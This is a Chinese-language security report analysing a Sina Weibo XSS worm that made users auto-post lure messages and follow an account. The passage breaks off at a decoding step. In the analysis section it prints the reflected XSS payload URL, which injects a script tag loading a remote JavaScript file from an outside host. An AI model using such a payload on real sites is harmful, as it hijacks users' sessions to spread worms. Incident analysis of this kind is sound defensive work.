欢迎光临
我们一直在努力

Nevel公司安全专家:新浪微博”中毒”分析报告

事件的经过
    新浪微博昨晚出现大范围”中毒”现象,大量用户自动发送”建党大业中穿帮的地方”,”个税起征点有望提到4000”,”郭美美事件的一些未注意到的细节”等带链接的微博与私信,并自动关注一位名为hellosamy的用户。
    此前,利用XSS漏洞传播蠕虫的案列在社交网站中曾多次发生,Facebook,Twitter,以及QQ空间,百度空间等都出现过类似的情况,此次新浪微博”中毒”,立刻引起了Nevel公司安全团队的重视。新浪官方早在第一时间就检测到该病毒,并对漏洞进行了修补,病毒的存活时间不到半个小时,其实XSS中毒现象也并不想传统意义上的中毒,仅仅存活在服务器上,它基本不会对用户电脑造成什么威胁,但会利用用户在新浪微博上的会话权限进行发布微博、关注等操作,同时该漏洞也无法获取到用户的密码信息,用户不需要有太多的担忧。

分析报告:

  下面我们来一起分析下该漏洞的成因:从PAYLOAD上来看,实际上属于一个反射弧性的XSS攻击,
http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update

URlDecode: